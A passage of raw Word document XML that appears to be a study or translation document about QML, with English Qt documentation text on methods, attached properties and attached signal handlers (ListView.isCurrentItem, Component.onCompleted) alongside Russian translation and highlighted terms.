          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00FC22F1">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function</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&lt;functionName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>([&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parameterName</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;[,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&lt;body&gt;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FC22F1" w:rsidRPr="00D815C8" w:rsidRDefault="00FC22F1" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Methods can be added to a QML type in order </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to define standalone, reusable blocks of JavaScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. These methods can be invoked either internally or by external objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="00F07A3D" w:rsidP="00CF5106">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc483000527"/>
      <w:bookmarkStart w:id="43" w:name="_Toc483603886"/>
      <w:bookmarkStart w:id="44" w:name="_Toc483605106"/>
      <w:r w:rsidRPr="003D69BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attached Properties and Attached Signal Handlers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="005A6BBD" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Присоединённые свойства или присоединённые обработчики сигналов – это механизмы, которые позволяют </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ам быть аннотированными экстра свойствами или обработчиками сигналов, которые иначе будут недоступными для </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ов. В частности, они позволяют </w:t>
      </w:r>
      <w:r w:rsidR="00085476" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>объект</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ам получить доступ к свойствам или сигналам, которые являются </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>уместными для индивидуальных экземпляров</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="00F07A3D" w:rsidP="00F07A3D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="36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 xml:space="preserve">References to attached properties and handlers take the following </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> form:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="00F07A3D" w:rsidP="00F07A3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&lt;AttachingType&gt;.&lt;propertyName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="00F07A3D" w:rsidP="00F07A3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&lt;AttachingType&gt;.on&lt;SignalName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="00F07A3D" w:rsidP="00F07A3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For </w:t>
      </w:r>
      <w:r w:rsidRPr="003F208F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has an attached property</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:anchor="isCurrentItem-attached-prop" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView.isCurrentItem</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>that is available to each delegate object in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This can be used by each individual delegate object to determine whether it is the currently selected item in the view:</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import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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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width</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240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height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320</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model</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delegate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Rectangle</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width</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100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height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30</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color</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ListView</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isCurrentItem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"red"</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"yellow"</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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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In this case, the name of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is</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ListView</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the property in question is</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isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, hence the attached property is referred to as</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ListView.isCurrentItem</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="00F07A3D" w:rsidP="00F07A3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An attached signal handler is referred to in the same way. For example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:anchor="completed-signal" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component.onCompleted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attached signal handler is commonly used to execute some JavaScript code when a component's creation process has been completed. In the example below, once the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListModel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>has been fully created, its</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Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal handler will automatically be invoked to populate the model:</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import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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListView</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width</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240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height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320</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model</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ListModel</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id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listModel</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component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onCompleted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for</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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i</w:t>
      </w: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listModel</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append</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"Name"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"Item "</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i</w:t>
      </w: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delegate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Text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text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index </w:t>
      </w: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HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F07A3D" w:rsidRPr="00D815C8" w:rsidRDefault="00F07A3D" w:rsidP="00F07A3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Since the name of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attaching type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is</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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and that type has a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:anchor="completed-signal" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>completed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal, the attached signal handler is referred to as</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Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F208F" w:rsidRDefault="003F208F" w:rsidP="003F3E61">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F3E61" w:rsidRPr="00D815C8" w:rsidRDefault="003F3E61" w:rsidP="003F208F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
